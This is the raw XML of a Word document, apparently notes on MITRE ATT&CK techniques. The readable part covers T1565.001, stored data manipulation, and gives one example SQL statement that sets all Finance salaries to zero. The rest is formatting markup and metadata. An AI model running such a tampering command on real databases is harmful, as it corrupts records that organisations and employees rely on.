          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> Technique 3: T1565.001 – Stored Data Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5A4C70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Corrupt or alter data to disrupt operations.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F335F62" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Access database and maliciously update records:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DF0A0B" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179120DD" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve"> employees </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SET</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve"> salary=0 </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve"> department='Finance';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A68219" w14:textId="77777777" w:rsidR="00211A90" w:rsidRPr="007A5D49" w:rsidRDefault="00211A90" w:rsidP="007A5D49"/>
    <w:sectPr w:rsidR="00211A90" w:rsidRPr="007A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578"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F6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E79D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E38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25232"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1AB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00255"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F4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B61D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="000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F1B2E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B4B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D402E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C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26510"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DFE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56925"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA18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0574"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B01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0174F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D37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A544C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="66F8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924D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34A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E4D6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="41A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54460"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D95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D39AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="289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D5C49"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2EC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F1E1C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="90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511FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F08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14C7E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="952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84EEA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B1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F2272"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2B6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031EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6F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619E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B2A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B626A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87E8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22491"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34B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D3808"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B18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022CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB2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0471A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EF6E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2750D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A16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B43AC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DFF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5210F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E26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022CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="401A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46C8E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B8A8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E025D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B0DC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740774">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="430972980">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="123621344">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1700741764">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="869997527">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1616717554">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="572860588">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1893804358">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1030423395">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="898319533">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2120907426">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1433042675">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="788163113">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1433748328">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="662851065">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="586773308">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1796290739">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="507066163">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="5401136">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1303147938">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="511995769">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1326392917">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="694968268">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="221060232">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1043675497">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="967783286">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1491949473">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1280840738">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="2027630328">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1012804095">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1101032157">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="897937030">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="471337214">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1310598273">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1705866157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90"/>
    <w:rsid w:val="001137E2"/>
    <w:rsid w:val="002061AA"/>
    <w:rsid w:val="00211A90"/>
    <w:rsid w:val="005B30C4"/>
    <w:rsid w:val="005B4A12"/>
    <w:rsid w:val="006D2390"/>
    <w:rsid w:val="007A5D49"/>
    <w:rsid w:val="008A534E"/>
    <w:rsid w:val="008B6328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0A7C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1FC8F06C-984E-41F9-B7BF-5D0FE105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90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5B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30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0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5B30C4"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="005B3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20694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2862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214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783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6518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14601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13341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135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22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44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3869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5782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7738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2211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72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8223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15250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555423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2540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0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8162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8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0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9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70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4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2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1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36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0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9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2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8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44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5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8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7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0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6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1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2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8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4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3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9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0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3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0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1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9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77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8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1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9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5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8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3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8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3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82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2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3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67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16440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2393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70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81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08874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9730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28341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6463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3002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9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6206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29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8752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5373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56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76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885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01182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52261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740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61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5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929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5418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6304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4127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211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71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198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35200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19158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0263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88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75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3505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07527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80803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96227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426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797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4268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96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8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8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71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7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5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04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1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9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8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7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94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2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2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5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5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3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9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0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19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0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5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6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3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62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4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9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6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0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731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7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66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0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1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4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6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6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7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5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2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7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6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7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2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1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5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0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6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7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0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8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6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66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5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6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2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3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5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9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3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4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5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3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7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1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4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9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0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1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5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8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7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09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8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50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9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9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4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90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6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2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3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6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63794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7601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8149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48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4074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6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4295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4736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611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14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45697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60323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12750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606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650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5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0561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70586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93951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672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3888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32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0813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37222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15420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1614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8116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79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5440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62676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90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3328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94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04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1449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1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5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7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9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9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9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8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4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0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7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1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6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4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1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8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5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1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86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9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2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1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2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9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7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6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9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9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5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2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43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4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4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3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7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7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3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7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8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2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8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9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5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6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3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1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2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1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6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9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7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4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7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6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0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8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7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4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9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5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6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1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7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8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88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6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0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4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9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5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2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4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9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5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3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5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5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9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7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1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9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02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55217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087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5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5560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46798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90376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74384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688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48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95545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11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76541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5331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112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384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08785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20817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22905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9789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8099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87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68974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10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0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6776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804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9627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27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1454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19470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64602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092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6097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02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0244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98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60102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7889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973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83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3605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68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2500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7096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4975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08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5886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30947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7554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6413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3402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60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3042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32061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0684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8273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3569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56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7316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00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54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2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6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8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1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7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2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7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8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2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4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0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4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1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6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0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0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88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4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6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9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4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0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2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1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2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8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3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5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48153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49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901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0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46887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21723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84262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668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48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46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22186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Billa</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Chaitanya Mayekar</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-03T12:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-03T12:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>